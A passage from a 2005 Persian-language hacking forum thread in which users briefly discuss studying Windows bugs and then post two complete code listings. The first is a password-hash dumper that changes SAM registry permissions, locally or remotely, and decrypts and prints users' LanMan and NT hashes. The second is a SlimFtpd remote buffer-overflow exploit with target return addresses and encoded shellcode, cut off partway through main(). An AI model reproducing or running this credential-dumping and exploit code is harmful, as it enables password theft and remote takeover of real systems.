		RegCloseKey(key2);
	}
}

کوروش جان نظری داری بگو !

( یکی اسم این ترد رو عوض کنه ! )

**M-r-r** · 2005-08-01, 04:51 PM

بابا بیخیال . . .
زشته . . .
قباهت داره . . .
. . .
.

**Hakimi** · 2005-08-02, 08:06 AM

من هدفت از نوشتنش را نمی دانستم. کاش قبل تر می نوشتی. من تصور کردم به عنوان یک خبر این موضوع را نوشتی و نه برای یادگیری.
خیلی عالی است که در مورد این Bug ها تحقیق کنیم

و اما : درست است که توسط دیگران کشف می شود و بعد Microsoft برای رفع مشکل Patch و HotFix صادر می کند، ولی در اکثر موارد پیش از این که این Bug ها به صورت عمومی اعلام شوند، Patch ها و HotFix هایشان منتشر می شود. اگر به موقع سیستم عامل را Update کنیم در اکثر موارد می توانیم با خیال راحت زندگی کنیم!

راستی اسم این Threadرا چه بگذاریم؟!
فکر کنم اگر این Thread به همین صورت ادامه یابد یکی از پر خواننده ترین Thread ها شود

من که شخصا خیلی علاقه مندم.

Source من برای این گونه موارد astalavista.com است. معمولا این گونه Exploit ها در AstalaVista منتشر می شوند.

باز هم ممنون.

(حالا من متوجه منظور محمد رسول نشدم!)

**!!!!!!!!!!!!!!!** · 2005-08-02, 08:32 AM

کد HTML:

/*
 * (C) Jeremy Allison 1997. #All rights reserved.#i
 * 
 * This program is free for commercial and non-commercial use.
 *
 * Redistribution and use in source and binary forms, with or without
 * modification, are permitted.
 *
 * THIS SOFTWARE IS PROVIDED BY JEREMY ALLISON ``AS IS'' AND
 * ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE
 * IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE
 * ARE DISCLAIMED.  IN NO EVENT SHALL THE AUTHOR OR CONTRIBUTORS BE LIABLE
 * FOR ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR CONSEQUENTIAL
 * DAMAGES (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS
 * OR SERVICES; LOSS OF USE, DATA, OR PROFITS; OR BUSINESS INTERRUPTION)
 * HOWEVER CAUSED AND ON ANY THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT
 * LIABILITY, OR TORT (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY
 * OUT OF THE USE OF THIS SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF
 * SUCH DAMAGE.
 *
 */

#include <windows.h>
#include <string.h>
#include <stdlib.h>
#include <stdio.h>

#include "des.h"

/*
 * Program to dump the Lanman and NT MD4 Hashed passwords from
 * an NT SAM database into a Samba smbpasswd file. Needs Administrator 
 * privillages to run.
 * Takes one arg - the name of the machine whose SAM database you
 * wish to dump, if this arg is not given it dumps the local machine
 * account database.
 */

/*
 * Convert system error to char. Returns 
 * memory allocated with LocalAlloc.
 */

char *error_to_string(DWORD error)
{
  char *msgbuf;
  
  if(FormatMessage(
       FORMAT_MESSAGE_ALLOCATE_BUFFER | FORMAT_MESSAGE_FROM_SYSTEM,
       NULL,
       error,
       MAKELANGID(LANG_NEUTRAL, SUBLANG_DEFAULT), /* Default language */
       (char *)&msgbuf,
       0,
       NULL
       ) == 0)
    return 0;
  return msgbuf;
}

/*
 * Return a pointer to a string describing an os error.
 * error_to_string returns a pointer to LocalAlloc'ed
 * memory. Cache it and release when the next one is
 * requested.
 */

char *str_oserr(DWORD err)
{
  static char *lastmsg = 0;

  if(lastmsg)
    LocalFree((HLOCAL)lastmsg);

  lastmsg = error_to_string(err);
  return lastmsg;
}

/*
 * Utility function to get allocate a SID from a name.
 * Looks on local machine. SID is allocated with LocalAlloc
 * and must be freed by the caller.
 * Returns TRUE on success, FALSE on fail.
 */

BOOL get_sid(const char *name, SID **ppsid)
{
  SID_NAME_USE sid_use;
  DWORD sid_size = 0;
  DWORD dom_size = 0;
  char *domain;

  *ppsid = 0;
  if(LookupAccountName(0, name, 0, &sid_size, 0, &dom_size, &sid_use) == 0) {
    if(GetLastError() != ERROR_INSUFFICIENT_BUFFER) {
      fprintf( stderr, "get_sid: LookupAccountName for size on name %s failed. Error was %s\n",
            name, str_oserr(GetLastError()));
      return FALSE;
    }
  }

  *ppsid = (SID *)LocalAlloc( LMEM_FIXED, sid_size);
  domain = (char *)LocalAlloc( LMEM_FIXED, dom_size);
  if( *ppsid == 0 || domain == 0) {
    fprintf( stderr, "get_sid: LocalAlloc failed. Error was %s\n",
                 str_oserr(GetLastError()));
    if(*ppsid)
      LocalFree((HLOCAL)*ppsid);
    if(domain)
      LocalFree((HLOCAL)domain);
    *ppsid = 0;
    return FALSE;
  }

  if(LookupAccountName(0, name, *ppsid, &sid_size, domain, &dom_size, &sid_use) == 0) {
    fprintf( stderr, 
         "get_sid: LookupAccountName failed for name %s. Error was %s\n",
         name, str_oserr(GetLastError()));
    LocalFree((HLOCAL)*ppsid);
    LocalFree((HLOCAL)domain);
    *ppsid = 0;
    return FALSE;
  }

  LocalFree((HLOCAL)domain);
  return TRUE;
}

/*
 * Utility function to setup a security descriptor
 * from a varargs list of char *name followed by a DWORD access
 * mask. The access control list is allocated with LocalAlloc
 * and must be freed by the caller.
 * returns TRUE on success, FALSE on fail.
 */

BOOL create_sd_from_list( SECURITY_DESCRIPTOR *sdout, int num, ...)
{
  va_list ap;
  SID **sids = 0;
  char *name;
  DWORD amask;
  DWORD acl_size;
  PACL pacl = 0;
  int i;

  if((sids = (SID **)calloc(1,sizeof(SID *)*num)) == 0) {
    fprintf(stderr, "create_sd_from_list: calloc fail.\n");
    return FALSE;
  }

  acl_size = num * (sizeof(ACL) +
             sizeof(ACCESS_ALLOWED_ACE) +
             sizeof(DWORD));

  /* Collect all the SID's */
  va_start( ap, num);
  for( i = 0; i < num; i++) {
    name = va_arg( ap, char *);
    amask = va_arg(ap, DWORD);
    if(get_sid( name, &sids[i]) == FALSE)
      goto cleanup;
    acl_size += GetLengthSid(sids[i]);
  }
  va_end(ap);
  if((pacl = (PACL)LocalAlloc( LMEM_FIXED, acl_size)) == 0) {
    fprintf( stderr, "create_sd_from_list: LocalAlloc fail. Error was %s\n",
            str_oserr(GetLastError()));
    goto cleanup;
  }

  if(InitializeSecurityDescriptor( sdout, SECURITY_DESCRIPTOR_REVISION) == FALSE) {
    fprintf( stderr, "create_sd_from_list: InitializeSecurityDescriptor fail. Error was %s\n",
                 str_oserr(GetLastError()));
    goto cleanup;
  }
  if(InitializeAcl( pacl, acl_size, ACL_REVISION) == FALSE) {
    fprintf( stderr, "create_sd_from_list: InitializeAcl fail. Error was %s\n",
                 str_oserr(GetLastError()));
    goto cleanup;
  }
  va_start(ap, num);
  for( i = 0; i < num; i++) {
    ACE_HEADER *ace_p;
    name = va_arg( ap, char *);
    amask = va_arg( ap, DWORD);
    if(AddAccessAllowedAce( pacl, ACL_REVISION, amask, sids[i]) == FALSE) {
      fprintf( stderr, "create_sd_from_list: AddAccessAllowedAce fail. Error was %s\n",
                 str_oserr(GetLastError()));
      goto cleanup;
    }
    /* Make sure the ACE is inheritable */
    if(GetAce( pacl, 0, (LPVOID *)&ace_p) == FALSE) {
      fprintf( stderr, "create_sd_from_list: GetAce fail. Error was %s\n",
                 str_oserr(GetLastError()));
      goto cleanup;
    }
    ace_p->AceFlags |= ( CONTAINER_INHERIT_ACE | OBJECT_INHERIT_ACE);
  }

  /* Add the ACL into the sd. */
  if(SetSecurityDescriptorDacl( sdout, TRUE, pacl, FALSE) == FALSE) {
    fprintf( stderr, "create_sd_from_list: SetSecurityDescriptorDacl fail. Error was %s\n",
               str_oserr(GetLastError()));
    goto cleanup;
  }
  for( i = 0; i < num; i++)
    if(sids[i] != 0)
      LocalFree((HLOCAL)sids[i]);
  free(sids);

  return TRUE;

cleanup:

  if(sids != 0) {
    for( i = 0; i < num; i++)
      if(sids[i] != 0)
        LocalFree((HLOCAL)sids[i]);
    free(sids);
  }
  if(pacl != 0)
    LocalFree((HLOCAL)pacl);
  return FALSE;
}

/*
 * Function to go over all the users in the SAM and set an ACL
 * on them.
 */

int set_userkeys_security( HKEY start, const char *path, SECURITY_DESCRIPTOR *psd, 
						  HKEY *return_key)
{
	HKEY key;
	DWORD err;
	char usersid[128];
	DWORD indx = 0;
	
	/* Open the path and enum all the user keys - setting
	   the same security on them. */
	if((err = RegOpenKeyEx( start, path, 0, KEY_ENUMERATE_SUB_KEYS, &key)) !=
					ERROR_SUCCESS) {
		fprintf(stderr, "set_userkeys_security: Failed to open key %s to enumerate. \
Error was %s.\n",
				    path, str_oserr(err));
			return -1;
	}


	/* Now enumerate the subkeys, setting the security on them all. */
	do {
		DWORD size;
		FILETIME ft;

		size = sizeof(usersid);
		err = RegEnumKeyEx(	key, indx, usersid, &size, 0, 0, 0, &ft);
		if(err == ERROR_SUCCESS) {
			HKEY subkey;

			indx++;
			if((err = RegOpenKeyEx( key, usersid, 0, WRITE_DAC, &subkey)) !=
						ERROR_SUCCESS) {
				fprintf(stderr, "set_userkeys_security: Failed to open key %s to set security. \
Error was %s.\n",
						usersid, str_oserr(err));
				RegCloseKey(key);
				return -1;
			}
			if((err = RegSetKeySecurity( subkey, DACL_SECURITY_INFORMATION,
										 psd)) != ERROR_SUCCESS) {
				fprintf(stderr, "set_userkeys_security: Failed to set security on key %s. \
Error was %s.\n",
						usersid, str_oserr(err));
				RegCloseKey(subkey);
				RegCloseKey(key);
				return -1;
			}
			RegCloseKey(subkey);
		}
	} while(err == ERROR_SUCCESS);

	if(err != ERROR_NO_MORE_ITEMS) {
		RegCloseKey(key);
		return -1;
	}
	if(return_key == 0)
		RegCloseKey(key);
	else
		*return_key = key;
	return 0;
}

/*
 * Function to travel down the SAM security tree in the registry and restore
 * the correct ACL on them. Returns 0 on success. -1 on fail.
 */

int restore_sam_tree_access( HKEY start )
{
	char path[128];
	char *p;
	HKEY key;
	DWORD err;
	SECURITY_DESCRIPTOR sd;
	DWORD admin_mask;

	admin_mask = WRITE_DAC | READ_CONTROL;

	if(create_sd_from_list( &sd, 2, "SYSTEM", GENERIC_ALL,
							"Administrators", admin_mask) == FALSE)
		return -1;

	strcpy( path, "SECURITY\\SAM\\Domains\\Account\\Users");

	/* Remove the security on the user keys first. */
	if(set_userkeys_security( start, path, &sd, 0) != 0)
			return -1;

	/* now go up the path, restoring security */
	do {
		if((err = RegOpenKeyEx( start, path, 0, WRITE_DAC, &key)) !=
						ERROR_SUCCESS) {
			fprintf(stderr, "restore_sam_tree_access:Failed to open key %s to set \
security. Error was %s.\n",
					path, str_oserr(err));
			return -1;
		}
		if((err = RegSetKeySecurity( key, DACL_SECURITY_INFORMATION,
									 &sd)) != ERROR_SUCCESS) {
			fprintf(stderr, "restore_sam_tree_access: Failed to set security on key %s. \
Error was %s.\n",
					path, str_oserr(err));
			RegCloseKey(key);
			return  -1;
		}
		RegCloseKey(key);
		p = strrchr(path, '\\');
		if( p != 0) 
			*p = 0;
	} while( p != 0 );

	return 0;
}

/*
 * Function to travel the security tree and add Administrators
 * access as WRITE_DAC, READ_CONTROL and READ.
 * Returns 0 on success. -1 on fail if no security was changed,
 * -2 on fail if security was changed.
 */

int set_sam_tree_access( HKEY start, HKEY *return_key)
{
	char path[128];
	char *p;
	HKEY key;
	DWORD err;
	BOOL security_changed = FALSE;
	SECURITY_DESCRIPTOR sd;
	DWORD admin_mask;
	BOOL finished = FALSE;

	admin_mask = WRITE_DAC | READ_CONTROL | KEY_QUERY_VALUE | KEY_ENUMERATE_SUB_KEYS;

	if(create_sd_from_list( &sd, 2, "SYSTEM", GENERIC_ALL,
							"Administrators", admin_mask) == FALSE)
		return -1;

	strcpy( path, "SECURITY\\SAM\\Domains\\Account\\Users");
	p = strchr(path, '\\');

	do {
		if( p != 0) 
			*p = 0;
		else
			finished = TRUE;
		if((err = RegOpenKeyEx( start, path, 0, WRITE_DAC, &key)) !=
						ERROR_SUCCESS) {
			fprintf(stderr, "set_sam_tree_access:Failed to open key %s to set \
security. Error was %s.\n",
					path, str_oserr(err));
			return (security_changed ? -2: -1);
		}
		if((err = RegSetKeySecurity( key, DACL_SECURITY_INFORMATION,
									 &sd)) != ERROR_SUCCESS) {
			fprintf(stderr, "set_sam_tree_access: Failed to set security on key %s. \
Error was %s.\n",
					path, str_oserr(err));
			RegCloseKey(key);
			return (security_changed ? -2: -1);
		}
		security_changed = TRUE;
		RegCloseKey(key);
		if(p != 0) {
			*p++ = '\\';
			p = strchr(p, '\\');
		}
	} while( !finished );

	if(set_userkeys_security( start, path, &sd, &key) != 0)
		return -2;
	if(return_key == 0)
		RegCloseKey(key);
	else
		*return_key = key;
	return 0;
}

/* 
 * Function to get a little-endian int from an offset into
 * a byte array.
 */

int get_int( char *array )
{
	return ((array[0]&0xff) + ((array[1]<<8)&0xff00) +
		   ((array[2]<<16)&0xff0000) +
		   ((array[3]<<24)&0xff000000));
}

/*
 * Convert a 7 byte array into an 8 byte des key with odd parity.
 */

void str_to_key(unsigned char *str,unsigned char *key)
{
	void des_set_odd_parity(des_cblock *);
	int i;

	key[0] = str[0]>>1;
	key[1] = ((str[0]&0x01)<<6) | (str[1]>>2);
	key[2] = ((str[1]&0x03)<<5) | (str[2]>>3);
	key[3] = ((str[2]&0x07)<<4) | (str[3]>>4);
	key[4] = ((str[3]&0x0F)<<3) | (str[4]>>5);
	key[5] = ((str[4]&0x1F)<<2) | (str[5]>>6);
	key[6] = ((str[5]&0x3F)<<1) | (str[6]>>7);
	key[7] = str[6]&0x7F;
	for (i=0;i<8;i++) {
		key[i] = (key[i]<<1);
	}
	des_set_odd_parity((des_cblock *)key);
}

/*
 * Function to convert the RID to the first decrypt key.
 */

void sid_to_key1(unsigned long sid,unsigned char deskey[8])
{
	unsigned char s[7];

	s[0] = (unsigned char)(sid & 0xFF);
	s[1] = (unsigned char)((sid>>8) & 0xFF);
	s[2] = (unsigned char)((sid>>16) & 0xFF);
	s[3] = (unsigned char)((sid>>24) & 0xFF);
	s[4] = s[0];
	s[5] = s[1];
	s[6] = s[2];

	str_to_key(s,deskey);
}

/*
 * Function to convert the RID to the second decrypt key.
 */

void sid_to_key2(unsigned long sid,unsigned char deskey[8])
{
	unsigned char s[7];
	
	s[0] = (unsigned char)((sid>>24) & 0xFF);
	s[1] = (unsigned char)(sid & 0xFF);
	s[2] = (unsigned char)((sid>>8) & 0xFF);
	s[3] = (unsigned char)((sid>>16) & 0xFF);
	s[4] = s[0];
	s[5] = s[1];
	s[6] = s[2];

	str_to_key(s,deskey);
}

/*
 * Function to split a 'V' entry into a users name, passwords and comment.
 */

int check_vp(char *vp, int vp_size, char **username, char **fullname,
			 char **comment, char **homedir,
			 char *lanman,int *got_lanman,
			 char *md4,  int *got_md4,
			 DWORD rid
			 )
{
	des_key_schedule ks1, ks2;
	des_cblock deskey1, deskey2;
	int username_offset = get_int(vp + 0xC);
	int username_len = get_int(vp + 0x10); 
	int fullname_offset = get_int(vp + 0x18);
	int fullname_len = get_int(vp + 0x1c);
	int comment_offset = get_int(vp + 0x24);
	int comment_len = get_int(vp + 0x28);
	int homedir_offset = get_int(vp + 0x48);
	int homedir_len = get_int(vp + 0x4c);
	int pw_offset = get_int(vp + 0x9c);

	*username = 0;
	*fullname = 0;
	*comment = 0;
	*homedir = 0;
	*got_lanman = 0;
	*got_md4 = 0;

	if(username_len < 0 || username_offset < 0 || comment_len < 0 ||
			   fullname_len < 0 || homedir_offset < 0 ||
		       comment_offset < 0 || pw_offset < 0)
		return -1;
	username_offset += 0xCC;
	fullname_offset += 0xCC;
	comment_offset += 0xCC;
	homedir_offset += 0xCC;
	pw_offset += 0xCC;

	if((*username = (char *)malloc(username_len + 1)) == 0) {
		fprintf(stderr, "check_vp: malloc fail for username.\n");
		return -1;
	}
	if((*fullname = (char *)malloc(fullname_len + 1)) == 0) {
		fprintf(stderr, "check_vp: malloc fail for username.\n");
		free(*username);
		*username = 0;
		return -1;
	}
	if((*comment = (char *)malloc(comment_len + 1)) == 0) {
		fprintf(stderr, "check_vp: malloc fail for comment.\n");
		free(*username);
		*username = 0;
		free(*fullname);
		*fullname = 0;
		return -1;
	}
	if((*homedir = (char *)malloc(homedir_len + 1)) == 0) {
		fprintf(stderr, "check_vp: malloc fail for homedir.\n");
		free(*username);
		*username = 0;
		free(*fullname);
		*fullname = 0;
		free(*comment);
		*comment = 0;
		return -1;
	}
	wcstombs( *username, (wchar_t *)(vp + username_offset), username_len/sizeof(wchar_t));
	(*username)[username_len/sizeof(wchar_t)] = 0;
	wcstombs( *fullname, (wchar_t *)(vp + fullname_offset), fullname_len/sizeof(wchar_t));
	(*fullname)[fullname_len/sizeof(wchar_t)] = 0;
	wcstombs( *comment, (wchar_t *)(vp + comment_offset), comment_len/sizeof(wchar_t));
	(*comment)[comment_len/sizeof(wchar_t)] = 0;
	wcstombs( *homedir, (wchar_t *)(vp + homedir_offset), homedir_len/sizeof(wchar_t));
	(*homedir)[homedir_len/sizeof(wchar_t)] = 0;

	if(pw_offset >= vp_size) {
		/* No password */
		*got_lanman = 0;
		*got_md4 = 0;
		return 0;
	}

	/* Check that the password offset plus the size of the
	   lanman and md4 hashes fits within the V record. */
	if(pw_offset + 32 > vp_size) {
		/* Account disabled ? */
		*got_lanman = -1;
		*got_md4 = -1;
		return 0;
	}

	/* Get the two decrpt keys. */
	sid_to_key1(rid,(unsigned char *)deskey1);
	des_set_key((des_cblock *)deskey1,ks1);
	sid_to_key2(rid,(unsigned char *)deskey2);
	des_set_key((des_cblock *)deskey2,ks2);
	
	vp += pw_offset;
	/* Decrypt the lanman password hash as two 8 byte blocks. */
	des_ecb_encrypt((des_cblock *)vp,
					(des_cblock *)lanman, ks1, DES_DECRYPT);
	des_ecb_encrypt((des_cblock *)(vp + 8),
					(des_cblock *)&lanman[8], ks2, DES_DECRYPT);

	vp += 16;
	/* Decrypt the NT md4 password hash as two 8 byte blocks. */
	des_ecb_encrypt((des_cblock *)vp,
					(des_cblock *)md4, ks1, DES_DECRYPT);
	des_ecb_encrypt((des_cblock *)(vp + 8),
					(des_cblock *)&md4[8], ks2, DES_DECRYPT);

	*got_lanman = 1;
	*got_md4 = 1;
	return 0;
}

/*
 * Function to print out a 16 byte array as hex.
 */

void print_hexval(char *val)
{
	int i;
	for(i = 0; i < 16; i++)
		printf("%02X", (unsigned char)val[i]);
}

/* 
 * Function to strip out any ':' or '\n', '\r' from a text
 * string.
 */

void strip_text( char *txt )
{
	char *p;
	for( p = strchr(txt, ':'); p ; p = strchr( p + 1, ':'))
		*p = '_';
	for( p = strchr(txt, '\n'); p ; p = strchr(p + 1, '\n'))
		*p = '_';										   
	for( p = strchr(txt, '\r'); p ; p = strchr(p + 1, '\r'))
		*p = '_';
}

/*
 * Function to dump a users smbpasswd entry onto stdout.
 * Returns 0 on success, -1 on fail.
 */

int printout_smb_entry( HKEY user, DWORD rid )
{
 	DWORD err;
	DWORD type;
	DWORD size = 0;
	char *vp;
	char lanman[16];
	char md4_hash[16];
	char *username;
	char *fullname;
	char *comment;
	char *homedir;
	int got_lanman;
	int got_md4;

	/* Find out how much space we need for the 'V' value. */
	if((err = RegQueryValueEx( user, "V", 0, &type, 0, &size)) 
								!= ERROR_SUCCESS) {
		fprintf(stderr, "printout_smb_entry: Unable to determine size needed \
for user 'V' value. Error was %s.\n.", str_oserr(err));
		return -1;
	}
	if((vp = (char *)malloc(size)) == 0) {
		fprintf(stderr, "printout_smb_entry: malloc fail for user entry.\n");
		return -1;
	}
	if((err = RegQueryValueEx( user, "V", 0, &type, (LPBYTE)vp, &size)) 
								!= ERROR_SUCCESS) {
		fprintf(stderr, "printout_smb_entry: Unable to read user 'V' value. \
Error was %s.\n.", str_oserr(err));
		free(vp);
		return -1;
	}
	/* Check heuristics */
	if(check_vp(vp, size, &username, &fullname, &comment, 
						&homedir, lanman, &got_lanman, 
		               md4_hash, &got_md4, rid) != 0) {
		fprintf(stderr, "Failed to parse entry for RID %X\n", rid);
		free(vp);
		return 0;
	}
	/* Ensure username of comment don't have any nasty suprises
	   for us such as an embedded ':' or '\n' - see multiple UNIX
	   passwd field update security bugs for details... */
	strip_text( username );
	strip_text( fullname );
	strip_text( comment );
	/* If homedir contains a drive letter this mangles it - but it protects
	   the integrity of the smbpasswd file. */
	strip_text( homedir );

	printf("%s:%d:", username, rid);
	if(got_lanman) {
		if(got_lanman == -1) /* Disabled account ? */
			printf("********************************");
		else
			print_hexval(lanman);
	} else
		printf("NO PASSWORD*********************");
	printf(":");
	if(got_md4) {
		if(got_md4 == -1)  /* Disabled account ? */
			printf("********************************");
		else
			print_hexval(md4_hash);
	} else
		printf("NO PASSWORD*********************");
	printf(":");
	if(*fullname)
		printf("%s", fullname);
	if(*fullname && *comment)
		printf(",");
	if(*comment)
		printf("%s", comment);
	printf(":");
	if(*homedir)					   
		printf("%s", homedir);
	printf(":\n");

	free(username);
	free(comment);
	free(homedir);
	free(vp);
	return 0;
}

/*
 * Function to go through all the user SID's - dumping out
 * their SAM values. Returns 0 on success, -1 on fail.
 */

int enumerate_users( HKEY key)
{
	DWORD indx = 0;
	DWORD err;
	DWORD rid;
	char usersid[128];

	do {
		DWORD size;
		FILETIME ft;

		size = sizeof(usersid);
		err = RegEnumKeyEx(	key, indx, usersid, &size, 0, 0, 0, &ft);
		if(err == ERROR_SUCCESS) {
			HKEY subkey;

			indx++;
			if((err = RegOpenKeyEx( key, usersid, 0, KEY_QUERY_VALUE, &subkey)) !=
						ERROR_SUCCESS) {
				fprintf(stderr, "enumerate_users: Failed to open key %s to read value. \
Error was %s.\n",
						usersid, str_oserr(err));
				RegCloseKey(key);
				return -1;
			}
			rid = strtoul(usersid, 0, 16);
			/* Hack as we know there is a Names key here */
			if(rid != 0) {
				if(printout_smb_entry( subkey, rid ) != 0) {
					RegCloseKey(subkey);
					return -1;
				}
			}
			RegCloseKey(subkey);
		}
	} while(err == ERROR_SUCCESS);

	if(err != ERROR_NO_MORE_ITEMS) {
		RegCloseKey(key);
		return -1;
	}
	return 0;
}

/*
 * Print usage message and die.
 */
void usage(const char *arg0) {
	fprintf(stderr, "Usage: %s <\\\\machine>\n", arg0);
	exit(-1);
}

/*
 * usage: \\machine
 */

int main(int argc, char **argv)
{
	char username[128];
	DWORD size;
	HKEY start_key = HKEY_LOCAL_MACHINE;
	HKEY users_key;
	int err;

	if(argc > 2)
		usage(argv[0]);

	/*
	 * Ensure we are running as Administrator before
	 * we will run.
	 */
	size = sizeof(username);
	if(GetUserName(username, &size)== FALSE) {
		fprintf(stderr, "%s: GetUserName() failed. Error was %s.", 
			argv[0], str_oserr(GetLastError()));
		return -1;
	}

	if(stricmp( "Administrator", username) != 0) {
		fprintf(stderr, "%s: You must be running as user Administrator \
to run this program\n", argv[0]);
		return -1;
	}

	/* 
	 * Open a connection to the remote machines registry.
	 */
	if(argc == 2) {
		if((err = RegConnectRegistry( argv[1], HKEY_LOCAL_MACHINE, &start_key)) !=
			ERROR_SUCCESS) {
			fprintf(stderr, "%s: Failed to connect to registry on remote computer %s.\
Error was %s.\n", argv[0], argv[1], str_oserr(err));
			return -1;
		}
	}

	/* 
	 * We need to get to HKEY_LOCAL_MACHINE\SECURITY\SAM\Domains\Account\Users.
	 * The security on this key normally doesn't allow Administrators
	 * to read - we need to add this.
	 */

	if((err = set_sam_tree_access( start_key, &users_key)) != 0) {
		if(err == -2)
			restore_sam_tree_access( start_key);
		return -1;
	}
	/* Print the users SAM entries in smbpasswd format onto stdout. */
	enumerate_users( users_key );
	RegCloseKey(users_key);
	/* reset the security on the SAM */
	restore_sam_tree_access( start_key );
	if(start_key != HKEY_LOCAL_MACHINE)
		RegCloseKey(start_key);
	return 0;
}

**!!!!!!!!!!!!!!!** · 2005-08-03, 10:15 AM

کد HTML:

/*
*
*	Written by redsand
*	<redsand@redsand.net>
*
*	Jul 22, 2005
*	Vulnerable: SlimFtpd v3.15 and v3.16
*	origional vuln found by: 
*
*	Usage: ./redslim 127.0.0.1 [# OS RET ]
*
*/



#include <stdio.h>
#include <stdlib.h>
#include <string.h>

#ifdef WIN
  #include <winsock2.h>
  #include <windows.h>
// #pragma lib <ws2_32.lib> // win32-lcc specific
  #pragma comment(lib, "ws2_32.lib") // ms vc++
#else
  #include <unistd.h>
  #include <sys/socket.h>
  #include <sys/types.h>
  #include <arpa/inet.h>
  #include <netdb.h>
#endif


#define USERNAME	"anonymous"
#define PASSWORD	"log@in.net"


// buf size = 512 + max

#define NOP				0x90	
#define BUFSIZE			2048
#define PORT			21
#define LSZ				525 

unsigned char *login [] = { "USER "USERNAME"\r\n", "PASS "PASSWORD"\r\n", "LIST ", "XMKD AAAAAAAA\r\n", "CWD AAAAAAAA\r\n", NULL };

unsigned char *targets [] =
        {
            "Windows XP SP0/SP1 ",
			"Windows XP SP2 ",
            "Windows 2000 SP1/SP4 ",
			"Windows 2003 Server SP1",
			"Denial-of-Service",
             NULL
        };

unsigned long offsets [] =
        {
			// jmp esi
			0x71a5b80b, // Windows XP 5.1.1.0 SP1 (IA32) Windows XP 5.1.0.0 SP0 (IA32)
			0x77f1a322, // Windows XP 5.1.2.0 SP2 (IA32)
            0x74ffbb65, // Windows 2000 5.0.1.0 SP1 (IA32) Windows 2000 5.0.4.0 SP4 (IA32)
			0x77f7fe67, // Windows 2003 Server 5.2.1.0 SP1 (IA32)
            0x44434241,
			0
        };

unsigned char shellcode[] = "\xEB"
"\x0F\x58\x80\x30\x88\x40\x81\x38\x68\x61\x63\x6B\x75\xF4\xEB\x05\xE8\xEC\xFF\xFF"
"\xFF\x60\xDE\x88\x88\x88\xDB\xDD\xDE\xDF\x03\xE4\xAC\x90\x03\xCD\xB4\x03\xDC\x8D"
"\xF0\x89\x62\x03\xC2\x90\x03\xD2\xA8\x89\x63\x6B\xBA\xC1\x03\xBC\x03\x89\x66\xB9"
"\x77\x74\xB9\x48\x24\xB0\x68\xFC\x8F\x49\x47\x85\x89\x4F\x63\x7A\xB3\xF4\xAC\x9C"
"\xFD\x69\x03\xD2\xAC\x89\x63\xEE\x03\x84\xC3\x03\xD2\x94\x89\x63\x03\x8C\x03\x89"
"\x60\x63\x8A\xB9\x48\xD7\xD6\xD5\xD3\x4A\x80\x88\xD6\xE2\xB8\xD1\xEC\x03\x91\x03"
"\xD3\x84\x03\xD3\x94\x03\x93\x03\xD3\x80\xDB\xE0\x06\xC6\x86\x64\x77\x5E\x01\x4F"
"\x09\x64\x88\x89\x88\x88\xDF\xDE\xDB\x01\x6D\x60\xAF\x88\x88\x88\x18\x89\x88\x88"
"\x3E\x91\x90\x6F\x2C\x91\xF8\x61\x6D\xC1\x0E\xC1\x2C\x92\xF8\x4F\x2C\x25\xA6\x61"
"\x51\x81\x7D\x25\x43\x65\x74\xB3\xDF\xDB\xBA\xD7\xBB\xBA\x88\xD3\x05\xC3\xA8\xD9"
"\x77\x5F\x01\x57\x01\x4B\x05\xFD\x9C\xE2\x8F\xD1\xD9\xDB\x77\xBC\x07\x77\xDD\x8C"
"\xD1\x01\x8C\x06\x6A\x7A\xA3\xAF\xDC\x77\xBF\x77\xDD\xB8\xB9\x48\xD8\xD8\xD8\xD8"
"\xC8\xD8\xC8\xD8\x77\xDD\xA4\x01\x4F\xB9\x53\xDB\xDB\xE0\x8A\x88\x88\xED\x01\x68"
"\xE2\x98\xD8\xDF\x77\xDD\xAC\xDB\xDF\x77\xDD\xA0\xDB\xDC\xDF\x77\xDD\xA8\x01\x4F"
"\xE0\xCB\xC5\xCC\x88\x01\x6B\x0F\x72\xB9\x48\x05\xF4\xAC\x24\xE2\x9D\xD1\x7B\x23"
"\x0F\x72\x09\x64\xDC\x88\x88\x88\x4E\xCC\xAC\x98\xCC\xEE\x4F\xCC\xAC\xB4\x89\x89"
"\x01\xF4\xAC\xC0\x01\xF4\xAC\xC4\x01\xF4\xAC\xD8\x05\xCC\xAC\x98\xDC\xD8\xD9\xD9"
"\xD9\xC9\xD9\xC1\xD9\xD9\xDB\xD9\x77\xFD\x88\xE0\xFA\x76\x3B\x9E\x77\xDD\x8C\x77"
"\x58\x01\x6E\x77\xFD\x88\xE0\x25\x51\x8D\x46\x77\xDD\x8C\x01\x4B\xE0\x77\x77\x77"
"\x77\x77\xBE\x77\x5B\x77\xFD\x88\xE0\xF6\x50\x6A\xFB\x77\xDD\x8C\xB9\x53\xDB\x77"
"\x58\x68\x61\x63\x6B\x90";

long gimmeip(char *);
void keepout();
void shell(int);

void keepout() {
#ifdef WIN
   WSACleanup();
#endif
   exit(1);
}

void banner() {
	printf("- SlimFtpd v3.15 and v3.16 remote buffer overflow\n");
	printf("- Written by redsand (redsand [at] redsand.net)\n");
}

void usage(char *prog) {
  int i;
  banner();
  printf("- Usage: %s <target ip> <OS> [target port]\n", prog);
  printf("- Targets:\n");
  for (i=0; targets[i] != NULL; i++)
	printf("\t- %d\t%s\n", i, targets[i]);
  printf("\n");

  exit(1);
}

/***************************************************************/
long gimmeip(char *hostname) {
  struct hostent *he;
  long ipaddr;

  if ((ipaddr = inet_addr(hostname)) < 0) {
	if ((he = gethostbyname(hostname)) == NULL) {
	   printf("[x] Failed to resolve host: %s! Exiting...\n\n",hostname);
           keepout();
	}
  memcpy(&ipaddr, he->h_addr, he->h_length);
  }

  return ipaddr;
}

int main(int argc, char *argv[]) {
  int sock;
  char expbuff[BUFSIZE]; 
  char recvbuff[BUFSIZE];
  void *p;
  unsigned short tport = PORT; // default port for ftp
  struct sockaddr_in target;
  unsigned long retaddr;
  int len,i=0;
  unsigned int tar;

#ifdef WIN
  WSADATA wsadata;
  WSAStartup(MAKEWORD(2,0), &wsadata);
#endif


  if(argc < 3) usage(argv[0]);

  if(argc == 4)
    tport = atoi(argv[3]);

  banner();
